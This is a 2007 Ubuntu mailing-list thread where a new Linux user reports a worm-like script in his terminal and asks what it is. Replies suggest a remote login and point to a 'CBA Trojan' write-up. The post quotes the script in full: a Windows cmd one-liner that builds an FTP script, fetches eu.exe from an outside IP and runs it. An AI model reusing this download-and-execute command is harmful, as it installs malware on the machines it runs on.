Antivirus program for ubuntu feisty amd64

Lucio M Nicolosi lmario at philippe.com.br
Sat May 12 05:32:48 UTC 2007 

cj wrote:
> Lucio M Nicolosi wrote:
>   
>> Mario Vukelic wrote:
>>   
>>     
>>>> You would not have had any infections on Linux without the antivir
>>>> program either, since there are no Linux viruses in the wild :)
>>>>       
>>>>         
>> New to Linux, installed a Ubuntu 6.10 partition (for tests) in my office 
>> desktop, connected to Novell Netware and an ADSL link (Suse Linux Proxy 
>> and Firewall).
>>
>> A couple of days ago noticed an application suddenly taking control of 
>> the terminal window and running the following script:
>>
>> (user)@phil:~$ 5~.~
>>
>> (user)@phil::~$ %systemroot%\system32\cmd.exe
>>
>> (user)@phil:~$ cmd /c echo open 201.27.157.123 42043 >> ik     &echo 
>> user t g >> ik &echo get eu.exe >> ik &echo bye >> ik &ftp -n -v -s:ik 
>> &del ik &eu.exe &exit
>>
>> from the script "ik" in /home/(user)
>>
>> Could't find any "ik" script in my home (Ubuntu 7.04) desktop.
>>
>> Looked like a worm, then I run antivirus on Win partition, looked for 
>> the Windows "eu.exe" virus and variants but found no trace of it, at 
>> least on my desktop.
>>
>> Has anyone any idea of what kind of script is this?
>>
>> L.
>>
>>   
>>     
> More then likely, someone logged on to your computer (looks like they 
> did it through telnet, but i could be wrong). In that case, either hook 
> your computer into a firewall or download one for linux (which linux 
> doesnt really need one, but if you are using your system for large-scale 
> business, then its a good idea to get a firewall)
>
> Sometimes i have noticed that when somebody logs on to my system and 
> runs there script (yes i was hacked once..good thing my firewall blocked 
> the attack...but it didnt catch the remote login?), it doesnt execute 
> right..just fyi..most of the time it does though, especially when DoSing.
>
> --cj
Just found a very recent reference for an "CBA Trojan" in the folowing link

http://www.scriptalias.com/?p=90

it describes exactly what I noticed in my Ubuntu desktop.

More information about the ubuntu-users mailing list